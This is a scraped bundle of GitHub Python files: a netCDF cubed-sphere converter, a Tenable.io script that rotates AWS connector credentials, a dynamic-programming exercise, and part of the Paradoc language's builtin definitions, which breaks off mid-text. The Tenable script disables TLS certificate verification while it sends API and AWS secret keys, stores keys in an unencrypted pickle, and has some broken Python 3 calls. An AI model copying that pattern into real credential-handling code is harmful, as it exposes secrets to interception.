False\nfor dim in ncFid.dimensions:\n if dim == 'lev':\n haveLev = True\n levSize = len(ncFid.dimensions['lev'])\n\n\nhaveTime = False\nfor dim in ncFid.dimensions:\n if dim == 'time':\n haveTime = True\n timeSize = len(ncFid.dimensions['time'])\n\nif haveTime:\n time = ncFid.variables['time'][:]\nif haveLev:\n lev = ncFid.variables['lev'][:]\n levSize = len(ncFid.dimensions['lev'])\n\ncRes = len(ncFid.dimensions['Xdim'])\n\nXdim = ncFidOut.createDimension('lon',cRes)\nYdim = ncFidOut.createDimension('lat',cRes*6)\n\nif haveLev:\n levOut = ncFidOut.createDimension('lev',levSize)\n\nif haveTime:\n timeOut = ncFidOut.createDimension('time',timeSize)\n\nvXdim = ncFidOut.createVariable('lon','f8',('lon'))\nvYdim = ncFidOut.createVariable('lat','f8',('lat'))\nsetattr(ncFidOut.variables['lon'],'units','degrees_east')\nsetattr(ncFidOut.variables['lat'],'units','degrees_north')\nsetattr(ncFidOut.variables['lon'],'long_name','longitude')\nsetattr(ncFidOut.variables['lat'],'long_name','latitude')\nvXdim[:]=range(1,cRes+1)\nvYdim[:]=range(1,(cRes*6)+1)\n\nif haveLev:\n vLevOut= ncFidOut.createVariable('lev','f8',('lev'))\n for att in ncFid.variables['lev'].ncattrs():\n setattr(ncFidOut.variables['lev'],att,getattr(ncFid.variables['lev'],att))\n vLevOut[:] = range(1,levSize+1)\n\nif haveTime:\n vtimeOut = ncFidOut.createVariable('time','i4',('time'))\n for att in ncFid.variables['time'].ncattrs():\n setattr(ncFidOut.variables['time'],att,getattr(ncFid.variables['time'],att))\n vtimeOut[:] = range(timeSize)\n\nExclude_Var = ['Xdim','Ydim','time','lev','lons','lats','contacts','anchor','cubed_sphere','nf','ncontact','corner_lons','corner_lats']\n\nfor var in ncFid.variables:\n if var not in Exclude_Var:\n temp = ncFid.variables[var][:]\n dim_size =len(temp.shape)\n if haveTime:\n dim_size = dim_size -1\n \n if dim_size == 4:\n if haveTime:\n tout = ncFidOut.createVariable(var,'f4',('time','lev','lat','lon'),fill_value=1.0e15)\n else:\n tout = ncFidOut.createVariable(var,'f4',('lev','lat','lon'),fill_value=1.0e15)\n for att in ncFid.variables[var].ncattrs():\n if att != \"_FillValue\":\n setattr(ncFidOut.variables[var],att,getattr(ncFid.variables[var],att))\n for i in range(6):\n il = cRes*i\n iu = cRes*(i+1)\n for j in range(levSize):\n if haveTime:\n tout[:,j,il:iu,:]=temp[:,j,i,:,:]\n else:\n tout[j,il:iu,:]=temp[j,i,:,:]\n\n elif dim_size == 3: \n if haveTime:\n tout = ncFidOut.createVariable(var,'f4',('time','lat','lon'),fill_value=1.0e15)\n else:\n tout = ncFidOut.createVariable(var,'f4',('lat','lon'),fill_value=1.0e15)\n for att in ncFid.variables[var].ncattrs():\n if att != \"_FillValue\":\n setattr(ncFidOut.variables[var],att,getattr(ncFid.variables[var],att))\n setattr(ncFidOut.variables[var],'grid_mapping','cubed_sphere')\n setattr(ncFidOut.variables[var],'coordinates','lons lats')\n for i in range(6):\n il = cRes*i\n iu = cRes*(i+1)\n for j in range(cRes):\n for k in range(cRes):\n if haveTime:\n tout[:,il+k,j]=temp[:,i,k,j].copy()\n else:\n tout[il+k,j]=temp[i,k,j]\n\n#-----------------\n# Closing the file\n#-----------------\nncFidOut.close()\nncFid.close()\n\n","repo_name":"bena-nasa/GEOS_Restart_Utilities","sub_path":"convertNewCStoOldCS.py","file_name":"convertNewCStoOldCS.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33950515063","text":"#!/usr/bin/env python\n#\n# This script enables you to go through and programmatically replace AWS Connector\n# credentials stored in Tenable.io.\n#\n# Script limitations:\n# - Does not handle multiple trails per connector.\n# - Doesn't have much error handling, only minimal logging.\n# - No immediate way to know if new creds are successful or not.\n#\n# Requirements: Python 3.7+, requests, pickle\n#\n# Author: ThisTooShallXSS (https://github.com/thistooshallxss)\n#\n# Usage: \n# - python tio_api_change_aws_conn.py (For interactive prompts)\n# - python tio_api_change_aws_conn.py 'AWS Connector 123' ACCESSCODE123 SECRETCODE123 \n#\n\nimport json, requests\nimport sys\nimport pickle\n\nrequests.packages.urllib3.disable_warnings()\n\nclass connector(object): # Object for storing existing connector details.\n def __init__(self, name, status, conn_id, conn_arn, trail_name):\n self.name = name\n self.status = status\n self.conn_id = conn_id\n self.conn_arn = conn_arn\n self.trail_name = trail_name\n\nclass new_creds(object): # Object for temp storing new AWS creds.\n def __init__(self, name, access, secret):\n self.name = name\n self.access = access\n self.secret = secret\n\ndef save_keys():\n #assumption is that the user keys didn't work or don't exsist\n print(\"Please provide your Tenable.io User API keys.\")\n access_key = input(\"Please provide your Tenable.io Access Key (use quotes): \")\n secret_key = input(\"Please provide your Tenable.io Secret Key (use quotes): \")\n\n dicts = {\"Access Key\": access_key, \"Secret Key\": secret_key}\n\n pickle_out = open(\"keys.pickle\", \"wb\")\n pickle.dump(dicts, pickle_out)\n pickle_out.close()\n\n print(\"Now you have keys, re-run your command\")\n sys.exit()\n\ndef grab_headers():\n import os\n\n access_key = ''\n secret_key = ''\n\n #check for API keys; if none, get them from the user by calling save_keys()\n if os.path.isfile('./keys.pickle') is False:\n save_keys()\n else:\n pickle_in = open(\"keys.pickle\", \"rb\")\n keys = pickle.load(pickle_in)\n access_key = keys[\"Access Key\"]\n secret_key = keys[\"Secret Key\"]\n\n #set the header\n headers = {'Content-type':'application/json',\n 'X-ApiKeys':'accessKey='+access_key+';secretKey='+secret_key}\n return headers\n\ndef get_data(url_mod):\n url = \"https://cloud.tenable.com\"\n headers = grab_headers()\n r = requests.request('GET', url + url_mod, headers=headers, verify=False)\n\n if r.status_code != 200:\n print('Status:', r.status_code, 'Problem with the initial GET request. Exiting.')\n sys.exit()\n\n data = r.json()\n return data\n\ndef get_connectors():\n data = get_data('/settings/connectors')\n connectors = []\n\n for x in range(len(data[\"connectors\"])):\n # Go through each configured connector and store it's settings.\n connectors.append(connector(\n data[\"connectors\"][x][\"name\"],\n data[\"connectors\"][x][\"status\"],\n data[\"connectors\"][x][\"id\"],\n data[\"connectors\"][x][\"params\"][\"trails\"][0][\"arn\"],\n data[\"connectors\"][x][\"params\"][\"trails\"][0][\"name\"]))\n\n return connectors\n\ndef put_connector_changes(connector_uuid, json_payload):\n # This makes the PUT request to replace credentials on T.io\n url = \"https://cloud.tenable.com/settings/connectors/\"\n headers = grab_headers()\n r = requests.request('PUT', url + connector_uuid, headers=headers, data=json_payload, verify=False)\n\n if r.status_code != 200:\n print('Status:', r.status_code, 'Problem with the final PUT request. Exiting.')\n sys.exit()\n\n return True\n\ndef report_connector_options(connectors):\n # For all available connectors, this shows the name/status/ID for each.\n print('\\nConnectors Available:')\n for x in range(len(connectors)):\n print(\"{} - {} (Status: {}) (ID: {})\").format(x, connectors[x].name, connectors[x].status, connectors[x].conn_id)\n\ndef get_connector_id_by_name(connectors, name):\n # This returns the UID of the connector when given a valid connector name.\n # Was previously used by our script, but has since been replaced with a simpler validity check.\n for x in range(len(connectors)):\n if connectors[x].name == name:\n ret = connectors[x].conn_id\n return ret\n\ndef check_valid_connector_by_name(connectors, name):\n # This returns True/False based on the existence of the AWS connector name.\n ret = False\n\n for x in range(len(connectors)):\n if connectors[x].name == name:\n ret = True\n return ret\n\ndef get_connector_obj_ref(connectors):\n # This isn't used in my script, but might be useful further down the road.\n print('\\nPlease type the name of the connector you would like to change credentials for:')\n choice = raw_input(' >>> ')\n ret = \"\"\n\n for x in range(len(connectors)):\n if connectors[x].name == choice:\n ret = x\n return ret\n\ndef prompt_for_creds(name):\n # In case we're not provided the creds at runtime, we prompt for them here.\n print(\"Changing authentication tokens for '{}'.\").format(name)\n access_key = raw_input(' Please provide your ACCESS key: ')\n secret_key = raw_input(' Please provide your SECRET key: ')\n ret = [access_key, secret_key]\n return ret\n\ndef store_creds(name):\n if len(sys.argv) == 4: # If argv3 & 4 are given, we use those\n access_key = sys.argv[2]\n secret_key = sys.argv[3]\n else: # otherwise we prompt for which creds to use instead.\n creds_list = prompt_for_creds(name)\n access_key = creds_list[0]\n secret_key = creds_list[1]\n\n # Returns an object \"new_creds\"\n return new_creds(name, access_key, secret_key)\n\ndef trigger_connector_import(uuid):\n # This makes the POST request to update the AWS connector status\n url = \"https://cloud.tenable.com/settings/connectors/\"\n action = \"/import\"\n headers = grab_headers()\n r = requests.request('POST', url + uuid + action, headers=headers, verify=False)\n # POST https://cloud.tenable.com/settings/connectors/6100a0f7-0101-4f13-8e60-90be93ca16c3/import\n\n if r.status_code != 200:\n print('Status:', r.status_code, 'Problem with the import POST request. Exiting.')\n sys.exit()\n\n return True \n\ndef change_stored_creds(connectors, creds):\n for x in range(len(connectors)):\n if connectors[x].name == creds.name:\n\n # At this point, we've identified the connector we're editing, and parsing all new details.\n connector_uuid = connectors[x].conn_id\n trail_arn = connectors[x].conn_arn\n trail_name = connectors[x].trail_name\n\n # Grab user-supplied details\n access_key = creds.access\n secret_key = creds.secret\n connector_name = creds.name\n\n # Build out the JSON payload which is submitted to make the changes.\n json_payload1 = '{{\"connector\":{{\"type\":\"aws\",\"data_type\":\"assets\",\"name\":\"{}\",'.format(connector_name)\n json_payload2 = '\"params\":{{\"trails\":[{{\"arn\":\"{}\",\"name\":\"{}\",\"region\":{{\"name\":\"All\",\"friendly_name\":\"All\"}},\"availability\":\"success\"}}],'.format(trail_arn, trail_name)\n json_payload3 = '\"access_key\":\"{}\",\"secret_key\":\"{}\"}}}}}}'.format(access_key, secret_key)\n\n # Separated the payload into 3 vars for easier readability.\n json_payload = json_payload1 + json_payload2 + json_payload3\n #print('Payload to be submitted:\\n\\n%s\\n' % json_payload)\n\n if put_connector_changes(connector_uuid, json_payload):\n print('The AWS credentials in Tenable.io have been replaced for \"{}\".').format(creds.name)\n trigger_connector_import(connector_uuid)\n outcome = True\n else:\n print('An error occurred when changing the AWS credentials for \"{}\".').format(creds.name)\n outcome = False\n break\n\n return outcome\n\ndef get_name_choice(connectors):\n # If someone has provided argv1, we query for that connector name's validity.\n if len(sys.argv) > 1:\n choice = sys.argv[1]\n else: # Otherwise, we give them the available connectors and have them choose.\n report_connector_options(connectors)\n print('\\nPlease indicate the name of the connector you would like to change credentials for:')\n choice = raw_input(' >>> ')\n \n return choice\n\ndef main():\n try:\n connectors = get_connectors()\n except:\n print('Could not get connectors from Tenable.io... Quitting')\n sys.exit()\n\n connector_name = get_name_choice(connectors)\n new_creds = []\n \n if check_valid_connector_by_name(connectors, connector_name):\n new_creds = store_creds(connector_name)\n\n change_stored_creds(connectors, new_creds)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ThisTooShallXSS/tio_automation","sub_path":"Pre-2020/tio_api_change_aws_conn.py","file_name":"tio_api_change_aws_conn.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"42240040587","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\ndp = [1] * N\nanswer = []\n\nfor i in range(1, N):\n for j in range(0,i):\n if arr[i] > arr[j]:\n dp[i] = max(dp[j] + 1, dp[i])\n\nprint(max(dp))\nflag = max(dp)\nfor i in range(N-1, -1, -1):\n if flag == dp[i]:\n answer.append(arr[i])\n flag -= 1\n\nanswer.reverse()\nfor i in range(len(answer)):\n print(answer[i], end=\" \")\n","repo_name":"wrjang96/BJ-algorithm","sub_path":"BJ - 14002(가장 긴 증가하는 부분 수열 4).py","file_name":"BJ - 14002(가장 긴 증가하는 부분 수열 4).py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18640665271","text":"# coding: utf-8\nfrom paradoc.objects import *\nfrom typing import Callable, List, Optional, Tuple\nimport itertools\nimport paradoc.num as num\nimport paradoc.base as base\nimport sys, math\nimport time, datetime\nimport random\nimport operator, functools\nimport re\nfrom paradoc.builtins.case import Case, CasedBuiltIn\nfrom paradoc.builtins.lazy_vars import arithmetic_literal_trigger\nfrom paradoc.string import str_class, case_double\nimport paradoc.discrete as discrete\n\ndef second_or_error(x: Tuple[object, Optional[PdObject]], error_msg: str) -> PdObject:\n t, t2 = x\n if t2 is None:\n raise AssertionError(error_msg)\n return t2\n\ndef initialize_builtins(env: Environment, sandboxed: bool, debug: bool) -> None:\n\n def put(*ss: str,\n docs: Optional[str] = None,\n stability: str = \"unstable\") -> Callable[[Callable[[Environment], None]], None]:\n name = ss[0]\n aliases = list(ss)\n def inner_put(f: Callable[[Environment], None]) -> None:\n for s in ss:\n env.put(s, BuiltIn(name, f, aliases=aliases,\n docs=docs, stability=stability), fail_if_overwrite=True)\n return inner_put\n\n def cput(name: str,\n extra_names: List[str],\n cases: List[Case],\n docs: Optional[str] = None,\n stability: str = \"unstable\",\n golf_aliases: Optional[List[str]] = None) -> CasedBuiltIn:\n builtin = CasedBuiltIn(name, cases, aliases = [name] + extra_names,\n docs=docs, stability=stability, golf_aliases=golf_aliases)\n env.put(name, builtin, fail_if_overwrite=True)\n for xname in extra_names: env.put(xname, builtin, fail_if_overwrite=True)\n return builtin\n\n # Default variables {{{\n env.put('N', '\\n', docs=\"Output record separator\", stability=\"stable\")\n env.put('A', 10, docs=\"Utility constant: ten\", stability=\"stable\")\n env.put('¹', 11, docs=\"Utility constant: eleven\", stability=\"unstable\")\n env.put(u'Ñ', '', docs=\"Output field separator\", stability=\"stable\")\n env.put('Ee', math.e, stability=\"beta\")\n env.put('Ep', 1e-9, docs=\"Epsilon for approximate tests\", stability=\"beta\")\n env.put('Pi', math.pi, stability=\"stable\")\n\n golden_ratio = (1 + math.sqrt(5)) / 2\n env.put('Ph', golden_ratio, docs=\"Golden ratio\", stability=\"alpha\")\n env.put('Phi', golden_ratio, stability=\"alpha\")\n\n env.put('Da', str_class('0-9'), docs=\"Digit alphabet\", stability=\"alpha\")\n env.put('Ua', str_class('A-Z'), docs=\"Uppercase alphabet\", stability=\"alpha\")\n env.put('La', str_class('a-z'), docs=\"Lowercase alphabet\", stability=\"alpha\")\n env.put('Aa', str_class('A-Za-z'), docs=\"Alphabet\", stability=\"alpha\")\n\n # Non-breaking space (U+00A0)\n env.put('\\xa0', Char(' '), docs=\"Utility constant: space\", stability=\"alpha\")\n env.put('␣', Char(' '), docs=\"Utility constant: space\", stability=\"alpha\")\n\n env.put('Å', str_class('A-Z'), docs=\"Uppercase alphabet alias\", stability=\"alpha\")\n env.put('Åa', str_class('a-zA-Z'), stability=\"alpha\")\n env.put('Åb', case_double('BCDFGHJKLMNPQRSTVWXZ'), stability=\"alpha\")\n env.put('Åc', case_double('BCDFGHJKLMNPQRSTVWXYZ'), stability=\"alpha\")\n env.put('Åd', str_class('9-0'), stability=\"alpha\")\n env.put('Åf', str_class('A-Za-z0-9+/'), stability=\"alpha\")\n env.put('Åh', str_class('0-9A-F'), stability=\"alpha\")\n env.put('Åi', str_class('A-Za-z0-9_'), stability=\"alpha\")\n env.put('Åj', str_class('a-zA-Z0-9_'), stability=\"alpha\")\n env.put('Ål', str_class('z-a'), stability=\"alpha\")\n env.put('Åm', '()<>[]{}', stability=\"alpha\")\n env.put('Åp', str_class(' -~'), stability=\"alpha\")\n env.put('Åq', case_double('QWERTYUIOP'), stability=\"alpha\")\n env.put('Ås', case_double('ASDFGHJKL'), stability=\"alpha\")\n env.put('Åt', str_class('0-9A-Z'), stability=\"alpha\")\n env.put('Åu', str_class('Z-A'), stability=\"alpha\")\n env.put('Åv', case_double('AEIOU'), stability=\"alpha\")\n env.put('Åx', case_double('ZXCVBNM'), stability=\"alpha\")\n env.put('Åy', case_double('AEIOUY'), stability=\"alpha\")\n env.put('Åz', str_class('z-aZ-A'), stability=\"alpha\")\n\n env.put('Debug', int(debug),\n docs=\"\"\"A variable tested to see whether debugging output in the\n program should be enabled.\"\"\",\n stability=\"alpha\")\n\n env.put('\\x00', 0, stability=\"unstable\")\n env.put('∅', 0, stability=\"unstable\")\n env.put('\\x01', 1, stability=\"unstable\")\n env.put('α', 1, stability=\"unstable\")\n\n env.put('Hw', 'Hello, World!', stability=\"unstable\")\n # }}}\n # Bullet variable and hoarding {{{\n BULLET = '•'\n\n env.put(BULLET, Hoard(),\n docs=\"\"\"A utility variable assigned to by {{ 'Assign_bullet'|b }}\n and {{ 'Assign_bullet_destructive'|b }}. Initialized to a new\n hoard.\"\"\",\n stability=\"alpha\")\n\n env.put('H', Hoard(), docs=\"An empty Hoard\", stability=\"alpha\")\n\n def hoardify(env: Environment, prefix: str) -> None:\n env.delete_starting_with(prefix)\n env.put(prefix, Hoard())\n\n # closure binding shenanigans\n def add_hoardify_builtin(c: str) -> None:\n long_name = 'Hoardify_' + c.lower() # Hoardify_a, etc\n short_name = c + 'h' # Ah, etc\n builtin = BuiltIn(long_name,\n lambda env: hoardify(env, c),\n aliases=[short_name],\n docs=\"\"\"Hoardify the {c} variable: delete all variables starting\n with {c} and set {c} to a new empty hoard.\"\"\".format(c=c),\n stability=\"alpha\")\n env.put(long_name, builtin, fail_if_overwrite=True)\n env.put(short_name, builtin, fail_if_overwrite=True)\n\n for c in 'ABCD': add_hoardify_builtin(c)\n # }}}\n # Universal functions: stack stuff, list stuff {{{\n\n @put('Nop', ' ', '\\t', '\\n', '\\r',\n docs=\"Do nothing.\", stability=\"stable\")\n def nop(env: Environment) -> None: pass\n\n # @put('Dup', ':')\n # def dup(env: Environment) -> None:\n # a = env.pop()\n # env.push(a, a)\n cput('Dup', [':'], [Case.any(lambda env, x: [x, x])],\n docs=\"\"\"Duplicate the top element of the stack.\n\n ex: 1 2 3 : => 1 2 3 3\"\"\",\n stability=\"stable\")\n cput('Dup_pair', [':p', '¦'], [Case.any2(lambda env, a, b: [a, b, a, b])],\n docs=\"\"\"Duplicate the top two elements of the stack: a b -> a b a b\n\n ex: 1 2 3 :p => 1 2 3 2 3\"\"\",\n stability=\"beta\")\n cput('Dup_out', [':o'], [Case.any2(lambda env, a, b: [a, b, a])],\n docs=\"\"\"Duplicate the second element of the stack onto the top: a b\n -> a b a\n\n ex: 1 2 3 :o => 1 2 3 2\"\"\",\n stability=\"alpha\")\n cput('Swap', ['\\\\'], [Case.any2(lambda env, a, b: [b, a])],\n docs=\"\"\"Swap the top two elements of the stack.\n\n ex: 1 2 3\\ => 1 3 2\"\"\",\n stability=\"stable\")\n cput('Swap_around', ['\\\\a'], [Case.any3(lambda env, a, b, c: [c, b, a])],\n docs=\"\"\"Swap the first and third elements of the stack (swap\n \"around\" the second one).\n\n ex: 1 2 3\\\\a => 3 2 1\"\"\",\n stability=\"alpha\")\n cput('Swap_out', ['\\\\o'], [Case.any3(lambda env, a, b, c: [b, c, a])],\n docs=\"\"\"Rotate the top three elements of the stack so that the 3rd\n from the top is now on top (\"outward\" by two): a b c -> b c a\n\n ex: 1 2 3\\\\o => 2 3 1\"\"\",\n stability=\"beta\")\n cput('Swap_in', ['\\\\i'], [Case.any3(lambda env, a, b, c: [c, a, b])],\n docs=\"\"\"Rotate the top three elements of the stack so that the\n top is now on bottom (\"inward\" by two): a b c -> c a b\n\n ex: 1 2 3\\\\i => 3 1 2\"\"\",\n stability=\"beta\")\n cput('Pop', [';'], [Case.any(lambda env, x: [])],\n docs=\"\"\"Pop the top element of the stack.\n\n ex: 1 2 3; => 1 2\"\"\",\n stability=\"stable\")\n cput('Pop_under', ['¸'], [Case.any2(lambda env, x, y: [y])],\n docs=\"\"\"Pop the second from the top element of the stack.\n\n ex: 1 2 3¸ => 1 3\"\"\",\n stability=\"beta\")\n cput('Pop_out', [';o'], [Case.any3(lambda env, x, y, z: [y, z])],\n docs=\"\"\"Pop the third from the top element of the stack, named to\n be somewhat analogous to {{ '\\\\\\\\o'|b }}.\n\n ex: 1 2 3;o => 2 3\"\"\",\n stability=\"unstable\")\n cput('Pop_around', [';a'], [Case.any3(lambda env, x, y, z: [y])],\n docs=\"\"\"Pop the first and third from the top elements of the stack,\n named to be somewhat analogous to {{ '\\\\\\\\a'|b }}.\n\n ex: 1 2 3;a => 2\"\"\",\n stability=\"unstable\")\n cput('Pop_second_pair', [';p'], [Case.any3(lambda env, x, y, z: [z])],\n docs=\"\"\"Pop the second and third from the top elements of the\n stack. Not the first and second because that's\n {{ ';'|b }}{{ 'd'|bt }}.\n\n ex: 1 2 3;p => 3\"\"\",\n stability=\"unstable\")\n cput('Repr', ['`'], [Case.any(lambda env, x: [pd_repr(x)])],\n docs=\"Push the string Paradoc representation of the top element.\",\n stability=\"beta\")\n\n # Pop-if-boolean variants {{{\n # TODO: There are almost certainly better block semantics.\n cput('Pop_if_true', [';t'], [Case.any(lambda env, x: [] if x else [x])],\n docs=\"\"\"Look at the top element of the stack. Pop it if it's\n truthy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if_false', [';f'], [Case.any(lambda env, x: [x] if x else [])],\n docs=\"\"\"Look at the top element of the stack. Pop it if it's\n falsy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if', [';i'], [Case.any2(lambda env, x, y: [] if y else [x])],\n docs=\"\"\"Pop the top element of the stack. Pop the second element if\n the first element was truthy.\"\"\",\n stability=\"alpha\")\n cput('Pop_if_not', [';n'], [Case.any2(lambda env, x, y: [x] if y else [])],\n docs=\"\"\"Pop the top element of the stack. Pop the second element if\n the first element was falsy.\"\"\",\n stability=\"alpha\")\n # }}}\n\n @put('[', 'Mark', docs=\"Mark the stack.\", stability=\"stable\")\n def mark(env: Environment) -> None:\n env.mark_stack()\n @put(']', 'Pack',\n docs=\"Pack the elements above the last stack mark into a list.\",\n stability=\"stable\")\n def pack(env: Environment) -> None:\n env.push(env.pop_until_stack_marker())\n @put('¬', 'Pack_reverse', 'Pack_down',\n docs=\"\"\"Pack the elements above the last stack mark into a list in\n reverse order.\n\n ex: [1 2 3¬ => [3 2 1]\"\"\",\n stability=\"stable\")\n def pack_reverse(env: Environment) -> None:\n env.push(env.pop_until_stack_marker()[::-1])\n\n def check_against(condition: PdObject, target: PdObject) -> bool:\n if isinstance(condition, Block):\n return pd_sandbox_truthy(env, condition, [target])\n else:\n return target == condition\n\n @put(']_case', ']c',\n docs=\"\"\"Case statement: Takes a series of lists, the \"cases\",\n above the last stack mark, as well as one object, the \"target\",\n below the mark, which is popped. Then, find the first \"case\" such\n that the case \"matches\" the target, where \"matches\" means that if\n the case's first element is a block then the target must satisfy\n it, and otherwise they must be equal. Push or execute all\n remaining list elements in that first matching case.\"\"\",\n stability=\"beta\")\n def stack_marker_case(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n for case in case_list:\n if isinstance(case, list):\n if case:\n condition, *result = case\n\n if check_against(condition, target):\n env.push_or_eval(*result)\n break\n else:\n raise AssertionError('Empty case')\n else:\n raise AssertionError('Non-list case')\n @put(']_stream', ']s',\n docs=\"\"\"Stream case statement: Like the case statement, but just\n takes a series of alternative case predicates and case bodies\n instead of expecting them to be paired up.\"\"\",\n stability=\"alpha\")\n def stack_marker_stream(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n for condition, result in zip(case_list[::2], case_list[1::2]):\n if check_against(condition, target):\n env.push_or_eval(result)\n break\n @put(']_index', ']i',\n docs=\"\"\"Index case statement: Takes a series of \"cases\",\n above the last stack mark, as well as one object, the \"target\",\n below the mark, which is popped. Cyclically index the target into\n the list of cases. Push or execute that case.\"\"\",\n stability=\"beta\")\n def index_marker_case(env: Environment) -> None:\n case_list = env.pop_until_stack_marker()\n target = env.pop()\n env.push_or_eval(case_list[num.intify(target) % len(case_list)])\n\n @put(']_check',\n docs=\"\"\"Stack check: Takes a series of case predicates above the\n last stack mark. Peek at the same number of objects on the same\n stack below them. Assert that every object matches the\n corresponding predicate; otherwise, halt the program.\"\"\",\n stability=\"alpha\")\n def stack_marker_check(env: Environment) -> None:\n check_list = env.pop_until_stack_marker()\n n = len(check_list)\n failures = []\n for i, condition in enumerate(reversed(check_list)):\n target = env.index_stack_or_none(i)\n if target is None:\n failures.append('- {} ({} from top) of {}: not enough objects on stack for {}'.format(n - i, i, n, condition))\n elif not check_against(condition, target):\n failures.append('- {} ({} from top) of {}: condition {} not satisfied by target {}'.format(n - i, i, n, condition, target))\n\n if failures:\n msg = '\\n'.join(['Stack check failed!'] + list(reversed(failures)))\n print(msg, file=sys.stderr)\n raise PdExitException(msg, 1)\n\n cput('†', [], [Case.any(lambda env, x: [[x]])],\n docs=\"\"\"Pack the top element of the stack into a list by itself.\n\n ASCII alternative: 1_array; see {{ 'array'|it }}.\n\n ex: 1 2 3† => 1 2 [3]\"\"\",\n stability=\"stable\")\n cput('‡', [], [Case.any2(lambda env, x, y: [[x, y]])],\n docs=\"\"\"Pack the top two elements of the stack into a list.\n\n ASCII alternative: 2_array; see {{ 'array'|it }}.\n\n ex: 1 2 3‡ => 1 [2 3]\"\"\",\n stability=\"stable\")\n # }}}\n # Not {{{\n basic_not_case = Case.value(lambda env, x: [int(not x)])\n basic_not = cput('Not', [], [basic_not_case],\n docs=\"\"\"Logical NOT: 0 and empty lists/strings yield 1, everything else yields 0.\n\n ex: 0! => 1\n 1! => 0\n 2! => 0\n []! => 1\n [0]! => 0\"\"\",\n stability=\"stable\", golf_aliases=['!'])\n\n cput('!', [], [basic_not_case, Case.block(lambda env, block: [CompositionBlock(block, basic_not)])],\n docs=\"\"\"Logical {{ 'Not'|b }}: 0 and empty lists/strings yield 1, everything else yields 0.\n Or postcompose a logical NOT onto a block (not recursively though).\"\"\",\n stability=\"stable\")\n # }}}\n # \"Arithmetic\" {{{\n\n # \"Addition\" (concatenation, filtering, etc.) {{{\n add_case = Case.number2(lambda env, a, b: [num.pd_add(a, b)])\n cat_list_case = Case.list2_singleton(lambda env, a, b: [pd_to_list(a) + pd_to_list(b)])\n strcat_list_case = Case.seq2_singleton(lambda env, a, b: [env.pd_str(a) + env.pd_str(b)])\n filter_case = Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq)])\n compose_case = Case.block2(lambda env, block1, block2: [CompositionBlock(block1, block2)])\n cput('Plus', [], [add_case], docs=\"Add numbers.\", stability=\"stable\", golf_aliases=['+'])\n cput('Cat', [], [cat_list_case], docs=\"Concatenate two lists (numbers coerce to single-element lists).\", stability=\"stable\", golf_aliases=['+'])\n cput('Strcat', [], [strcat_list_case], docs=\"Concatenate two strings (numbers coerce to strings).\", stability=\"stable\", golf_aliases=['+'])\n cput('Filter', [], [filter_case], docs=\"Filter a list by a block (numbers coerce to ranges).\", stability=\"stable\", golf_aliases=['+'])\n cput('Compose', [], [compose_case], docs=\"Compose two blocks together.\", stability=\"alpha\", golf_aliases=['+'])\n cput('Plus_or_filter_or_compose', ['+', 'Plus_or_filter'], [add_case, cat_list_case, strcat_list_case, filter_case, compose_case],\n docs=\"\"\"Addition on numbers. Concatenation on lists and strings\n (numbers coerce to single-element lists or to strings). Filter on\n block and list (numbers coerce to ranges). Compose on blocks.\"\"\",\n stability=\"stable\")\n\n cput('Cat_between', ['Cb'], [\n Case.list2_singleton(lambda env, a, b: [pd_to_list(a) + pd_to_list(b) + pd_to_list(a)]),\n Case.seq2_singleton(lambda env, a, b: [env.pd_str(a) + env.pd_str(b) + env.pd_str(a)]),\n ],\n docs=\"\"\"two copies of a with b between: a, b -> a + b + a. Numbers\n coerce to single-element lists.\"\"\",\n stability=\"unstable\")\n cput('Cat_flank', ['Cf'], [\n Case.list2_singleton(lambda env, a, b: [pd_to_list(b) + pd_to_list(a) + pd_to_list(b)]),\n Case.seq2_singleton(lambda env, a, b: [env.pd_str(b) + env.pd_str(a) + env.pd_str(b)]),\n ],\n docs=\"\"\"a with two copies of b flanking: a, b -> b + a + b. Numbers\n coerce to single-element lists.\"\"\",\n stability=\"unstable\")\n # }}}\n # \"Subtraction\" (set subtraction, rejection, etc.) {{{\n minus_case = Case.number2(lambda env, a, b: [num.pd_sub(a, b)])\n reject_in_case = Case.seq2_singleton(lambda env, a, b: [pd_seq_difference(a, b)])\n reject_case = Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq, negate=True)])\n cput('Minus', [], [minus_case], docs=\"Subtract numbers.\", stability=\"stable\", golf_aliases=['-'])\n cput('Filter_not_in', ['Reject_in'], [reject_in_case],\n docs=\"Filter-not-in on lists and strings (numbers coerce to single-element lists).\",\n stability=\"stable\",\n golf_aliases=['-'])\n cput('Filter_not', ['Reject'], [reject_case],\n docs=\"Filter-not a list by a block (numbers coerce to ranges).\",\n stability=\"stable\"\n ,golf_aliases=['-'])\n cput('Minus_or_reject', ['-'], [minus_case, reject_in_case, reject_case],\n docs=\"\"\"Subtraction on numbers. Filter-not-in on lists and strings\n (numbers coerce to single-element lists). Filter-not on block and\n list (numbers coerce to ranges). See also {{ 'Antiminus'|b }}.\"\"\",\n stability=\"stable\",\n golf_aliases=['-'])\n\n cput('Antiminus', ['¯'], [\n Case.number2(lambda env, a, b: [num.pd_sub(b, a)]),\n Case.seq2_singleton(lambda env, a, b: [pd_seq_difference(b, a)]),\n Case.block_seq_range(lambda env, block, seq: [pd_filter(env, block, seq, negate=True)]),\n ],\n docs=\"\"\"Reversed subtraction. Compare\n {{ 'Minus_or_reject'|b }}.\"\"\",\n stability=\"beta\")\n # }}}\n # \"Multiplication\" (cartesian products, loops, etc.) {{{\n cput('Table', ['T'], [\n Case.seq2_range(lambda env, a, b: [pd_cartesian_product_seq_matrix(a, b)]),\n Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_map_cartesian_product(env, block, seq1, seq2, flat=False)]),\n ],\n docs=\"\"\"On two sequences (numbers coerce to ranges), \"structured\"\n Cartesian product: make a \"table\", 